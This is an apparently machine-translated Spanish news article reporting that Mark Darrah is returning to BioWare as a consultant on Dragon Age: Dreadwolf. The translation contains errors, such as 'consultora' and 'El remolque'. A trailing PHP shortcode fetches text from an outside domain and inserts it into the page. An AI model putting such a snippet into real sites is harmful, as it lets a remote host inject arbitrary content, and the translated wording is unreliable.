EA ha anunciado que el veterano de BioWare, Mark Darrah, está trabajando con el estudio nuevamente para ayudarlo a completar Dragon Age: Dreadwolf.


Darrah, que ahora se desempeña como consultora del juego, se retiró de BioWare en febrero de 2021 después de casi un cuarto de siglo en el estudio.


Durante este tiempo, dirigió la programación de los juegos de Baldur’s Gate, dirigió Sonic Chronicles y desarrolló la serie Dragon Age.




Dragon Age: The Dreadwolf – ¿Quién es Dreadwolf? El remolque




Además, EA le dijo a VentureBeat que el equipo de Mass Effect de BioWare ahora está ayudando con el desarrollo de Dragon Age: Dreadwolf, mientras que un pequeño grupo central liderado por Mike Gamble continúa el trabajo de preproducción en la próxima entrega de la serie de ciencia ficción.


Por el contrario, Dragon Age: Dreadwolf ha estado en posproducción desde septiembre pasado.


“Nuestro estudio se centra en hacer posible el mejor Dragon Age: Dreadwolf mientras el equipo central de Mass Effects continúa con su trabajo de preproducción”, dijo el gerente general de BioWare, Gary McKay. “Seguimos iterando y puliendo Dreadwolf mientras nos enfocamos en las cosas que más les importan a nuestros fanáticos.


“Mark Darrah se unirá al equipo como consultor mientras combinamos esta nueva experiencia con el legado de la serie, trayendo consigo años de experiencia trabajando en Dragon Age”.


Samantha Ryan, vicepresidenta sénior y directora general de grupo de EA, agregó: “BioWare tiene una larga historia en la creación de increíbles juegos para un solo jugador con historias poderosas en las que los fanáticos pueden sumergirse.


“Se están tomando su tiempo en el próximo Dragon Age, probando cosas nuevas, trayendo a las personas adecuadas y asegurándose de mejorar su juego. Eso es normal para un juego complejo de esta naturaleza”. , y el estudio quiere asegurarse de que sea adecuado para sus fans.




Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');